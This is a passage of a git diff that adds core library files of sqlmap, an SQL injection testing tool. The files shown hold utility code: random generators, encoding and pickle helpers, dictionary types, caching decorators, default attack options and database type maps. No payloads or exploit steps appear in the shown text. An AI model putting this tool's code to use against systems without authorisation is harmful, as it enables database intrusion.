f.read() + if not hashlib.sha256(content).hexdigest() == expected: + retVal &= False + break + + return retVal diff --git a/src/sqlmap-master/lib/core/compat.py b/src/sqlmap-master/lib/core/compat.py new file mode 100644 index 0000000..629c844 --- /dev/null +++ b/src/sqlmap-master/lib/core/compat.py @@ -0,0 +1,314 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import binascii +import functools +import math +import os +import random +import re +import sys +import time +import uuid + +class WichmannHill(random.Random): + """ + Reference: https://svn.python.org/projects/python/trunk/Lib/random.py + """ + + VERSION = 1 # used by getstate/setstate + + def seed(self, a=None): + """Initialize internal state from hashable object. + + None or no argument seeds from current time or from an operating + system specific randomness source if available. + + If a is not None or an int or long, hash(a) is used instead. + + If a is an int or long, a is used directly. Distinct values between + 0 and 27814431486575L inclusive are guaranteed to yield distinct + internal states (this guarantee is specific to the default + Wichmann-Hill generator). + """ + + if a is None: + try: + a = int(binascii.hexlify(os.urandom(16)), 16) + except NotImplementedError: + a = int(time.time() * 256) # use fractional seconds + + if not isinstance(a, int): + a = hash(a) + + a, x = divmod(a, 30268) + a, y = divmod(a, 30306) + a, z = divmod(a, 30322) + self._seed = int(x) + 1, int(y) + 1, int(z) + 1 + + self.gauss_next = None + + def random(self): + """Get the next random number in the range [0.0, 1.0).""" + + # Wichman-Hill random number generator. + # + # Wichmann, B. A. & Hill, I. D. (1982) + # Algorithm AS 183: + # An efficient and portable pseudo-random number generator + # Applied Statistics 31 (1982) 188-190 + # + # see also: + # Correction to Algorithm AS 183 + # Applied Statistics 33 (1984) 123 + # + # McLeod, A. I. (1985) + # A remark on Algorithm AS 183 + # Applied Statistics 34 (1985),198-200 + + # This part is thread-unsafe: + # BEGIN CRITICAL SECTION + x, y, z = self._seed + x = (171 * x) % 30269 + y = (172 * y) % 30307 + z = (170 * z) % 30323 + self._seed = x, y, z + # END CRITICAL SECTION + + # Note: on a platform using IEEE-754 double arithmetic, this can + # never return 0.0 (asserted by Tim; proof too long for a comment). + return (x / 30269.0 + y / 30307.0 + z / 30323.0) % 1.0 + + def getstate(self): + """Return internal state; can be passed to setstate() later.""" + return self.VERSION, self._seed, self.gauss_next + + def setstate(self, state): + """Restore internal state from object returned by getstate().""" + version = state[0] + if version == 1: + version, self._seed, self.gauss_next = state + else: + raise ValueError("state with version %s passed to " + "Random.setstate() of version %s" % + (version, self.VERSION)) + + def jumpahead(self, n): + """Act as if n calls to random() were made, but quickly. + + n is an int, greater than or equal to 0. + + Example use: If you have 2 threads and know that each will + consume no more than a million random numbers, create two Random + objects r1 and r2, then do + r2.setstate(r1.getstate()) + r2.jumpahead(1000000) + Then r1 and r2 will use guaranteed-disjoint segments of the full + period. + """ + + if n < 0: + raise ValueError("n must be >= 0") + x, y, z = self._seed + x = int(x * pow(171, n, 30269)) % 30269 + y = int(y * pow(172, n, 30307)) % 30307 + z = int(z * pow(170, n, 30323)) % 30323 + self._seed = x, y, z + + def __whseed(self, x=0, y=0, z=0): + """Set the Wichmann-Hill seed from (x, y, z). + + These must be integers in the range [0, 256). + """ + + if not type(x) == type(y) == type(z) == int: + raise TypeError('seeds must be integers') + if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): + raise ValueError('seeds must be in range(0, 256)') + if 0 == x == y == z: + # Initialize from current time + t = int(time.time() * 256) + t = int((t & 0xffffff) ^ (t >> 24)) + t, x = divmod(t, 256) + t, y = divmod(t, 256) + t, z = divmod(t, 256) + # Zero is a poor seed, so substitute 1 + self._seed = (x or 1, y or 1, z or 1) + + self.gauss_next = None + + def whseed(self, a=None): + """Seed from hashable object's hash code. + + None or no argument seeds from current time. It is not guaranteed + that objects with distinct hash codes lead to distinct internal + states. + + This is obsolete, provided for compatibility with the seed routine + used prior to Python 2.1. Use the .seed() method instead. + """ + + if a is None: + self.__whseed() + return + a = hash(a) + a, x = divmod(a, 256) + a, y = divmod(a, 256) + a, z = divmod(a, 256) + x = (x + a) % 256 or 1 + y = (y + a) % 256 or 1 + z = (z + a) % 256 or 1 + self.__whseed(x, y, z) + +def patchHeaders(headers): + if headers is not None and not hasattr(headers, "headers"): + if isinstance(headers, dict): + class _(dict): + def __getitem__(self, key): + for key_ in self: + if key_.lower() == key.lower(): + return super(_, self).__getitem__(key_) + + raise KeyError(key) + + def get(self, key, default=None): + try: + return self[key] + except KeyError: + return default + + headers = _(headers) + + headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers] + + return headers + +def cmp(a, b): + """ + >>> cmp("a", "b") + -1 + >>> cmp(2, 1) + 1 + """ + + if a < b: + return -1 + elif a > b: + return 1 + else: + return 0 + +# Reference: https://github.com/urllib3/urllib3/blob/master/src/urllib3/filepost.py +def choose_boundary(): + """ + >>> len(choose_boundary()) == 32 + True + """ + + retval = "" + + try: + retval = uuid.uuid4().hex + except AttributeError: + retval = "".join(random.sample("0123456789abcdef", 1)[0] for _ in xrange(32)) + + return retval + +# Reference: http://python3porting.com/differences.html +def round(x, d=0): + """ + >>> round(2.0) + 2.0 + >>> round(2.5) + 3.0 + """ + + p = 10 ** d + if x > 0: + return float(math.floor((x * p) + 0.5)) / p + else: + return float(math.ceil((x * p) - 0.5)) / p + +# Reference: https://code.activestate.com/recipes/576653-convert-a-cmp-function-to-a-key-function/ +def cmp_to_key(mycmp): + """Convert a cmp= function into a key= function""" + class K(object): + __slots__ = ['obj'] + + def __init__(self, obj, *args): + self.obj = obj + + def __lt__(self, other): + return mycmp(self.obj, other.obj) < 0 + + def __gt__(self, other): + return mycmp(self.obj, other.obj) > 0 + + def __eq__(self, other): + return mycmp(self.obj, other.obj) == 0 + + def __le__(self, other): + return mycmp(self.obj, other.obj) <= 0 + + def __ge__(self, other): + return mycmp(self.obj, other.obj) >= 0 + + def __ne__(self, other): + return mycmp(self.obj, other.obj) != 0 + + def __hash__(self): + raise TypeError('hash not implemented') + + return K + +# Note: patch for Python 2.6 +if not hasattr(functools, "cmp_to_key"): + functools.cmp_to_key = cmp_to_key + +if sys.version_info >= (3, 0): + xrange = range + buffer = memoryview +else: + xrange = xrange + buffer = buffer + +def LooseVersion(version): + """ + >>> LooseVersion("1.0") == LooseVersion("1.0") + True + >>> LooseVersion("1.0.1") > LooseVersion("1.0") + True + >>> LooseVersion("1.0.1-") == LooseVersion("1.0.1") + True + >>> LooseVersion("1.0.11") < LooseVersion("1.0.111") + True + >>> LooseVersion("foobar") > LooseVersion("1.0") + False + >>> LooseVersion("1.0") > LooseVersion("foobar") + False + >>> LooseVersion("3.22-mysql") == LooseVersion("3.22-mysql-ubuntu0.3") + True + >>> LooseVersion("8.0.22-0ubuntu0.20.04.2") + 8.000022 + """ + + match = re.search(r"\A(\d[\d.]*)", version or "") + + if match: + result = 0 + value = match.group(1) + weight = 1.0 + for part in value.strip('.').split('.'): + if part.isdigit(): + result += int(part) * weight + weight *= 1e-3 + else: + result = float("NaN") + + return result diff --git a/src/sqlmap-master/lib/core/convert.py b/src/sqlmap-master/lib/core/convert.py new file mode 100644 index 0000000..2a21112 --- /dev/null +++ b/src/sqlmap-master/lib/core/convert.py @@ -0,0 +1,479 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +try: + import cPickle as pickle +except: + import pickle + +import base64 +import binascii +import codecs +import json +import re +import sys +import time + +from lib.core.bigarray import BigArray +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA +from lib.core.settings import IS_TTY +from lib.core.settings import IS_WIN +from lib.core.settings import NULL +from lib.core.settings import PICKLE_PROTOCOL +from lib.core.settings import SAFE_HEX_MARKER +from lib.core.settings import UNICODE_ENCODING +from thirdparty import six +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import collections_abc as _collections + +try: + from html import escape as htmlEscape +except ImportError: + from cgi import escape as htmlEscape + +def base64pickle(value): + """ + Serializes (with pickle) and encodes to Base64 format supplied (binary) value + + >>> base64unpickle(base64pickle([1, 2, 3])) == [1, 2, 3] + True + """ + + retVal = None + + try: + retVal = encodeBase64(pickle.dumps(value, PICKLE_PROTOCOL), binary=False) + except: + warnMsg = "problem occurred while serializing " + warnMsg += "instance of a type '%s'" % type(value) + singleTimeWarnMessage(warnMsg) + + try: + retVal = encodeBase64(pickle.dumps(value), binary=False) + except: + retVal = encodeBase64(pickle.dumps(str(value), PICKLE_PROTOCOL), binary=False) + + return retVal + +def base64unpickle(value): + """ + Decodes value from Base64 to plain format and deserializes (with pickle) its content + + >>> type(base64unpickle('gAJjX19idWlsdGluX18Kb2JqZWN0CnEBKYFxAi4=')) == object + True + """ + + retVal = None + + try: + retVal = pickle.loads(decodeBase64(value)) + except TypeError: + retVal = pickle.loads(decodeBase64(bytes(value))) + + return retVal + +def htmlUnescape(value): + """ + Returns (basic conversion) HTML unescaped value + + >>> htmlUnescape('a<b') == 'a'), (""", '"'), (" ", ' '), ("&", '&'), ("'", "'")) + for code, value in replacements: + retVal = retVal.replace(code, value) + + try: + retVal = re.sub(r"&#x([^ ;]+);", lambda match: _unichr(int(match.group(1), 16)), retVal) + except (ValueError, OverflowError): + pass + + return retVal + +def singleTimeWarnMessage(message): # Cross-referenced function + sys.stdout.write(message) + sys.stdout.write("\n") + sys.stdout.flush() + +def filterNone(values): # Cross-referenced function + return [_ for _ in values if _] if isinstance(values, _collections.Iterable) else values + +def isListLike(value): # Cross-referenced function + return isinstance(value, (list, tuple, set, BigArray)) + +def shellExec(cmd): # Cross-referenced function + raise NotImplementedError + +def jsonize(data): + """ + Returns JSON serialized data + + >>> jsonize({'foo':'bar'}) + '{\\n "foo": "bar"\\n}' + """ + + return json.dumps(data, sort_keys=False, indent=4) + +def dejsonize(data): + """ + Returns JSON deserialized data + + >>> dejsonize('{\\n "foo": "bar"\\n}') == {u'foo': u'bar'} + True + """ + + return json.loads(data) + +def rot13(data): + """ + Returns ROT13 encoded/decoded text + + >>> rot13('foobar was here!!') + 'sbbone jnf urer!!' + >>> rot13('sbbone jnf urer!!') + 'foobar was here!!' + """ + + # Reference: https://stackoverflow.com/a/62662878 + retVal = "" + alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ" + for char in data: + retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char + return retVal + +def decodeHex(value, binary=True): + """ + Returns a decoded representation of provided hexadecimal value + + >>> decodeHex("313233") == b"123" + True + >>> decodeHex("313233", binary=False) == u"123" + True + """ + + retVal = value + + if isinstance(value, six.binary_type): + value = getText(value) + + if value.lower().startswith("0x"): + value = value[2:] + + try: + retVal = codecs.decode(value, "hex") + except LookupError: + retVal = binascii.unhexlify(value) + + if not binary: + retVal = getText(retVal) + + return retVal + +def encodeHex(value, binary=True): + """ + Returns a encoded representation of provided string value + + >>> encodeHex(b"123") == b"313233" + True + >>> encodeHex("123", binary=False) + '313233' + >>> encodeHex(b"123"[0]) == b"31" + True + """ + + if isinstance(value, int): + value = six.unichr(value) + + if isinstance(value, six.text_type): + value = value.encode(UNICODE_ENCODING) + + try: + retVal = codecs.encode(value, "hex") + except LookupError: + retVal = binascii.hexlify(value) + + if not binary: + retVal = getText(retVal) + + return retVal + +def decodeBase64(value, binary=True, encoding=None): + """ + Returns a decoded representation of provided Base64 value + + >>> decodeBase64("MTIz") == b"123" + True + >>> decodeBase64("MTIz", binary=False) + '123' + >>> decodeBase64("A-B_CDE") == decodeBase64("A+B/CDE") + True + >>> decodeBase64(b"MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA==") == b"1234" + True + """ + + if value is None: + return None + + padding = b'=' if isinstance(value, bytes) else '=' + + # Reference: https://stackoverflow.com/a/49459036 + if not value.endswith(padding): + value += 3 * padding + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(value, bytes): + value = value.replace(b'-', b'+').replace(b'_', b'/') + else: + value = value.replace('-', '+').replace('_', '/') + + retVal = base64.b64decode(value) + + if not binary: + retVal = getText(retVal, encoding) + + return retVal + +def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False): + """ + Returns a decoded representation of provided Base64 value + + >>> encodeBase64(b"123") == b"MTIz" + True + >>> encodeBase64(u"1234", binary=False) + 'MTIzNA==' + >>> encodeBase64(u"1234", binary=False, padding=False) + 'MTIzNA' + >>> encodeBase64(decodeBase64("A-B_CDE"), binary=False, safe=True) + 'A-B_CDE' + """ + + if value is None: + return None + + if isinstance(value, six.text_type): + value = value.encode(encoding or UNICODE_ENCODING) + + retVal = base64.b64encode(value) + + if not binary: + retVal = getText(retVal, encoding) + + if safe: + padding = False + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(retVal, bytes): + retVal = retVal.replace(b'+', b'-').replace(b'/', b'_') + else: + retVal = retVal.replace('+', '-').replace('/', '_') + + if not padding: + retVal = retVal.rstrip(b'=' if isinstance(retVal, bytes) else '=') + + return retVal + +def getBytes(value, encoding=None, errors="strict", unsafe=True): + """ + Returns byte representation of provided Unicode value + + >>> getBytes(u"foo\\\\x01\\\\x83\\\\xffbar") == b"foo\\x01\\x83\\xffbar" + True + """ + + retVal = value + + if encoding is None: + encoding = conf.get("encoding") or UNICODE_ENCODING + + try: + codecs.lookup(encoding) + except (LookupError, TypeError): + encoding = UNICODE_ENCODING + + if isinstance(value, six.text_type): + if INVALID_UNICODE_PRIVATE_AREA: + if unsafe: + for char in xrange(0xF0000, 0xF00FF + 1): + value = value.replace(_unichr(char), "%s%02x" % (SAFE_HEX_MARKER, char - 0xF0000)) + + retVal = value.encode(encoding, errors) + + if unsafe: + retVal = re.sub(r"%s([0-9a-f]{2})" % SAFE_HEX_MARKER, lambda _: decodeHex(_.group(1)), retVal) + else: + try: + retVal = value.encode(encoding, errors) + except UnicodeError: + retVal = value.encode(UNICODE_ENCODING, errors="replace") + + if unsafe: + retVal = re.sub(b"\\\\x([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), retVal) + + return retVal + +def getOrds(value): + """ + Returns ORD(...) representation of provided string value + + >>> getOrds(u'fo\\xf6bar') + [102, 111, 246, 98, 97, 114] + >>> getOrds(b"fo\\xc3\\xb6bar") + [102, 111, 195, 182, 98, 97, 114] + """ + + return [_ if isinstance(_, int) else ord(_) for _ in value] + +def getUnicode(value, encoding=None, noneToNull=False): + """ + Returns the unicode representation of the supplied value + + >>> getUnicode('test') == u'test' + True + >>> getUnicode(1) == u'1' + True + >>> getUnicode(None) == 'None' + True + """ + + # Best position for --time-limit mechanism + if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit): + raise SystemExit + + if noneToNull and value is None: + return NULL + + if isinstance(value, six.text_type): + return value + elif isinstance(value, six.binary_type): + # Heuristics (if encoding not explicitly specified) + candidates = filterNone((encoding, kb.get("pageEncoding") if kb.get("originalPage") else None, conf.get("encoding"), UNICODE_ENCODING, sys.getfilesystemencoding())) + if all(_ in value for _ in (b'<', b'>')): + pass + elif any(_ in value for _ in (b":\\", b'/', b'.')) and b'\n' not in value: + candidates = filterNone((encoding, sys.getfilesystemencoding(), kb.get("pageEncoding") if kb.get("originalPage") else None, UNICODE_ENCODING, conf.get("encoding"))) + elif conf.get("encoding") and b'\n' not in value: + candidates = filterNone((encoding, conf.get("encoding"), kb.get("pageEncoding") if kb.get("originalPage") else None, sys.getfilesystemencoding(), UNICODE_ENCODING)) + + for candidate in candidates: + try: + return six.text_type(value, candidate) + except (UnicodeDecodeError, LookupError): + pass + + try: + return six.text_type(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) + except UnicodeDecodeError: + return six.text_type(value, UNICODE_ENCODING, errors="reversible") + elif isListLike(value): + value = list(getUnicode(_, encoding, noneToNull) for _ in value) + return value + else: + try: + return six.text_type(value) + except UnicodeDecodeError: + return six.text_type(str(value), errors="ignore") # encoding ignored for non-basestring instances + +def getText(value, encoding=None): + """ + Returns textual value of a given value (Note: not necessary Unicode on Python2) + + >>> getText(b"foobar") + 'foobar' + >>> isinstance(getText(u"fo\\u2299bar"), six.text_type) + True + """ + + retVal = value + + if isinstance(value, six.binary_type): + retVal = getUnicode(value, encoding) + + if six.PY2: + try: + retVal = str(retVal) + except: + pass + + return retVal + +def stdoutEncode(value): + """ + Returns binary representation of a given Unicode value safe for writing to stdout + """ + + value = value or "" + + if IS_WIN and IS_TTY and kb.get("codePage", -1) is None: + output = shellExec("chcp") + match = re.search(r": (\d{3,})", output or "") + + if match: + try: + candidate = "cp%s" % match.group(1) + codecs.lookup(candidate) + except LookupError: + pass + else: + kb.codePage = candidate + + kb.codePage = kb.codePage or "" + + if isinstance(value, six.text_type): + encoding = kb.get("codePage") or getattr(sys.stdout, "encoding", None) or UNICODE_ENCODING + + while True: + try: + retVal = value.encode(encoding) + break + except UnicodeEncodeError as ex: + value = value[:ex.start] + "?" * (ex.end - ex.start) + value[ex.end:] + + warnMsg = "cannot properly display (some) Unicode characters " + warnMsg += "inside your terminal ('%s') environment. All " % encoding + warnMsg += "unhandled occurrences will result in " + warnMsg += "replacement with '?' character. Please, find " + warnMsg += "proper character representation inside " + warnMsg += "corresponding output files" + singleTimeWarnMessage(warnMsg) + + if six.PY3: + retVal = getUnicode(retVal, encoding) + + else: + retVal = value + + return retVal + +def getConsoleLength(value): + """ + Returns console width of unicode values + + >>> getConsoleLength("abc") + 3 + >>> getConsoleLength(u"\\u957f\\u6c5f") + 4 + """ + + if isinstance(value, six.text_type): + retVal = sum((2 if ord(_) >= 0x3000 else 1) for _ in value) + else: + retVal = len(value) + + return retVal diff --git a/src/sqlmap-master/lib/core/data.py b/src/sqlmap-master/lib/core/data.py new file mode 100644 index 0000000..6684834 --- /dev/null +++ b/src/sqlmap-master/lib/core/data.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.datatype import AttribDict +from lib.core.log import LOGGER + +# sqlmap paths +paths = AttribDict() + +# object to store original command line options +cmdLineOptions = AttribDict() + +# object to store merged options (command line, configuration file and default options) +mergedOptions = AttribDict() + +# object to share within function and classes command +# line options and settings +conf = AttribDict() + +# object to share within function and classes results +kb = AttribDict() + +# object with each database management system specific queries +queries = {} + +# logger +logger = LOGGER diff --git a/src/sqlmap-master/lib/core/datatype.py b/src/sqlmap-master/lib/core/datatype.py new file mode 100644 index 0000000..866b114 --- /dev/null +++ b/src/sqlmap-master/lib/core/datatype.py @@ -0,0 +1,248 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import copy +import threading +import types + +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import collections_abc as _collections + +class AttribDict(dict): + """ + This class defines the dictionary with added capability to access members as attributes + + >>> foo = AttribDict() + >>> foo.bar = 1 + >>> foo.bar + 1 + """ + + def __init__(self, indict=None, attribute=None, keycheck=True): + if indict is None: + indict = {} + + # Set any attributes here - before initialisation + # these remain as normal attributes + self.attribute = attribute + self.keycheck = keycheck + dict.__init__(self, indict) + self.__initialised = True + + # After initialisation, setting attributes + # is the same as setting an item + + def __getattr__(self, item): + """ + Maps values to attributes + Only called if there *is NOT* an attribute with this name + """ + + try: + return self.__getitem__(item) + except KeyError: + if self.keycheck: + raise AttributeError("unable to access item '%s'" % item) + else: + return None + + def __delattr__(self, item): + """ + Deletes attributes + """ + + try: + return self.pop(item) + except KeyError: + if self.keycheck: + raise AttributeError("unable to access item '%s'" % item) + else: + return None + + def __setattr__(self, item, value): + """ + Maps attributes to values + Only if we are initialised + """ + + # This test allows attributes to be set in the __init__ method + if "_AttribDict__initialised" not in self.__dict__: + return dict.__setattr__(self, item, value) + + # Any normal attributes are handled normally + elif item in self.__dict__: + dict.__setattr__(self, item, value) + + else: + self.__setitem__(item, value) + + def __getstate__(self): + return self.__dict__ + + def __setstate__(self, dict): + self.__dict__ = dict + + def __deepcopy__(self, memo): + retVal = self.__class__() + memo[id(self)] = retVal + + for attr in dir(self): + if not attr.startswith('_'): + value = getattr(self, attr) + if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): + setattr(retVal, attr, copy.deepcopy(value, memo)) + + for key, value in self.items(): + retVal.__setitem__(key, copy.deepcopy(value, memo)) + + return retVal + +class InjectionDict(AttribDict): + def __init__(self): + AttribDict.__init__(self) + + self.place = None + self.parameter = None + self.ptype = None + self.prefix = None + self.suffix = None + self.clause = None + self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 + + # data is a dict with various stype, each which is a dict with + # all the information specific for that stype + self.data = AttribDict() + + # conf is a dict which stores current snapshot of important + # options used during detection + self.conf = AttribDict() + + self.dbms = None + self.dbms_version = None + self.os = None + +# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python +class LRUDict(object): + """ + This class defines the LRU dictionary + + >>> foo = LRUDict(capacity=2) + >>> foo["first"] = 1 + >>> foo["second"] = 2 + >>> foo["third"] = 3 + >>> "first" in foo + False + >>> "third" in foo + True + """ + + def __init__(self, capacity): + self.capacity = capacity + self.cache = OrderedDict() + self.__lock = threading.Lock() + + def __len__(self): + return len(self.cache) + + def __contains__(self, key): + return key in self.cache + + def __getitem__(self, key): + value = self.cache.pop(key) + self.cache[key] = value + return value + + def get(self, key): + return self.__getitem__(key) + + def __setitem__(self, key, value): + with self.__lock: + try: + self.cache.pop(key) + except KeyError: + if len(self.cache) >= self.capacity: + self.cache.popitem(last=False) + self.cache[key] = value + + def set(self, key, value): + self.__setitem__(key, value) + + def keys(self): + return self.cache.keys() + +# Reference: https://code.activestate.com/recipes/576694/ +class OrderedSet(_collections.MutableSet): + """ + This class defines the set with ordered (as added) items + + >>> foo = OrderedSet() + >>> foo.add(1) + >>> foo.add(2) + >>> foo.add(3) + >>> foo.pop() + 3 + >>> foo.pop() + 2 + >>> foo.pop() + 1 + """ + + def __init__(self, iterable=None): + self.end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.map = {} # key --> [key, prev, next] + if iterable is not None: + self |= iterable + + def __len__(self): + return len(self.map) + + def __contains__(self, key): + return key in self.map + + def add(self, value): + if value not in self.map: + end = self.end + curr = end[1] + curr[2] = end[1] = self.map[value] = [value, curr, end] + + def discard(self, value): + if value in self.map: + value, prev, next = self.map.pop(value) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def pop(self, last=True): + if not self: + raise KeyError('set is empty') + key = self.end[1][0] if last else self.end[2][0] + self.discard(key) + return key + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self)) + + def __eq__(self, other): + if isinstance(other, OrderedSet): + return len(self) == len(other) and list(self) == list(other) + return set(self) == set(other) diff --git a/src/sqlmap-master/lib/core/decorators.py b/src/sqlmap-master/lib/core/decorators.py new file mode 100644 index 0000000..d2e7f47 --- /dev/null +++ b/src/sqlmap-master/lib/core/decorators.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import functools +import hashlib +import threading + +from lib.core.datatype import LRUDict +from lib.core.settings import MAX_CACHE_ITEMS +from lib.core.settings import UNICODE_ENCODING +from lib.core.threads import getCurrentThreadData + +_cache = {} +_cache_lock = threading.Lock() +_method_locks = {} + +def cachedmethod(f): + """ + Method with a cached content + + >>> __ = cachedmethod(lambda _: _) + >>> __(1) + 1 + >>> __(1) + 1 + >>> __ = cachedmethod(lambda *args, **kwargs: args[0]) + >>> __(2) + 2 + >>> __ = cachedmethod(lambda *args, **kwargs: next(iter(kwargs.values()))) + >>> __(foobar=3) + 3 + + Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ + """ + + _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS) + + @functools.wraps(f) + def _f(*args, **kwargs): + try: + key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs)).encode(UNICODE_ENCODING)).hexdigest(), 16) & 0x7fffffffffffffff + except ValueError: # https://github.com/sqlmapproject/sqlmap/issues/4281 (NOTE: non-standard Python behavior where hexdigest returns binary value) + result = f(*args, **kwargs) + else: + try: + with _cache_lock: + result = _cache[f][key] + except KeyError: + result = f(*args, **kwargs) + + with _cache_lock: + _cache[f][key] = result + + return result + + return _f + +def stackedmethod(f): + """ + Method using pushValue/popValue functions (fallback function for stack realignment) + + >>> threadData = getCurrentThreadData() + >>> original = len(threadData.valueStack) + >>> __ = stackedmethod(lambda _: threadData.valueStack.append(_)) + >>> __(1) + >>> len(threadData.valueStack) == original + True + """ + + @functools.wraps(f) + def _(*args, **kwargs): + threadData = getCurrentThreadData() + originalLevel = len(threadData.valueStack) + + try: + result = f(*args, **kwargs) + finally: + if len(threadData.valueStack) > originalLevel: + threadData.valueStack = threadData.valueStack[:originalLevel] + + return result + + return _ + +def lockedmethod(f): + @functools.wraps(f) + def _(*args, **kwargs): + if f not in _method_locks: + _method_locks[f] = threading.RLock() + + with _method_locks[f]: + result = f(*args, **kwargs) + + return result + + return _ diff --git a/src/sqlmap-master/lib/core/defaults.py b/src/sqlmap-master/lib/core/defaults.py new file mode 100644 index 0000000..4ae9c89 --- /dev/null +++ b/src/sqlmap-master/lib/core/defaults.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.datatype import AttribDict + +_defaults = { + "csvDel": ',', + "timeSec": 5, + "googlePage": 1, + "verbose": 1, + "delay": 0, + "timeout": 30, + "retries": 3, + "csrfRetries": 0, + "safeFreq": 0, + "threads": 1, + "level": 1, + "risk": 1, + "dumpFormat": "CSV", + "tablePrefix": "sqlmap", + "technique": "BEUSTQ", + "torType": "SOCKS5", +} + +defaults = AttribDict(_defaults) diff --git a/src/sqlmap-master/lib/core/dicts.py b/src/sqlmap-master/lib/core/dicts.py new file mode 100644 index 0000000..531ef10 --- /dev/null +++ b/src/sqlmap-master/lib/core/dicts.py @@ -0,0 +1,676 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import CONTENT_TYPE +from lib.core.enums import DBMS +from lib.core.enums import OS +from lib.core.enums import POST_HINT +from lib.core.settings import ACCESS_ALIASES +from lib.core.settings import ALTIBASE_ALIASES +from lib.core.settings import BLANK +from lib.core.settings import CACHE_ALIASES +from lib.core.settings import CRATEDB_ALIASES +from lib.core.settings import CUBRID_ALIASES +from lib.core.settings import DB2_ALIASES +from lib.core.settings import DERBY_ALIASES +from lib.core.settings import EXTREMEDB_ALIASES +from lib.core.settings import FIREBIRD_ALIASES +from lib.core.settings import FRONTBASE_ALIASES +from lib.core.settings import H2_ALIASES +from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES +from lib.core.settings import MAXDB_ALIASES +from lib.core.settings import MCKOI_ALIASES +from lib.core.settings import MIMERSQL_ALIASES +from lib.core.settings import MONETDB_ALIASES +from lib.core.settings import MSSQL_ALIASES +from lib.core.settings import MYSQL_ALIASES +from lib.core.settings import NULL +from lib.core.settings import ORACLE_ALIASES +from lib.core.settings import PGSQL_ALIASES +from lib.core.settings import PRESTO_ALIASES +from lib.core.settings import RAIMA_ALIASES +from lib.core.settings import SQLITE_ALIASES +from lib.core.settings import SYBASE_ALIASES +from lib.core.settings import VERTICA_ALIASES +from lib.core.settings import VIRTUOSO_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES + +FIREBIRD_TYPES = { + 261: "BLOB", + 14: "CHAR", + 40: "CSTRING", + 11: "D_FLOAT", + 27: "DOUBLE", + 10: "FLOAT", + 16: "INT64", + 8: "INTEGER", + 9: "QUAD", + 7: "SMALLINT", + 12: "DATE", + 13: "TIME", + 35: "TIMESTAMP", + 37: "VARCHAR", +} + +INFORMIX_TYPES = { + 0: "CHAR", + 1: "SMALLINT", + 2: "INTEGER", + 3: "FLOAT", + 4: "SMALLFLOAT", + 5: "DECIMAL", + 6: "SERIAL", + 7: "DATE", + 8: "MONEY", + 9: "NULL", + 10: "DATETIME", + 11: "BYTE", + 12: "TEXT", + 13: "VARCHAR", + 14: "INTERVAL", + 15: "NCHAR", + 16: "NVARCHAR", + 17: "INT8", + 18: "SERIAL8", + 19: "SET", + 20: "MULTISET", + 21: "LIST", + 22: "ROW (unnamed)", + 23: "COLLECTION", + 40: "Variable-length opaque type", + 41: "Fixed-length opaque type", + 43: "LVARCHAR", + 45: "BOOLEAN", + 52: "BIGINT", + 53: "BIGSERIAL", + 2061: "IDSSECURITYLABEL", + 4118: "ROW (named)", +} + +SYBASE_TYPES = { + 14: "floatn", + 8: "float", + 15: "datetimn", + 12: "datetime", + 23: "real", + 28: "numericn", + 10: "numeric", + 27: "decimaln", + 26: "decimal", + 17: "moneyn", + 11: "money", + 21: "smallmoney", + 22: "smalldatetime", + 13: "intn", + 7: "int", + 6: "smallint", + 5: "tinyint", + 16: "bit", + 2: "varchar", + 18: 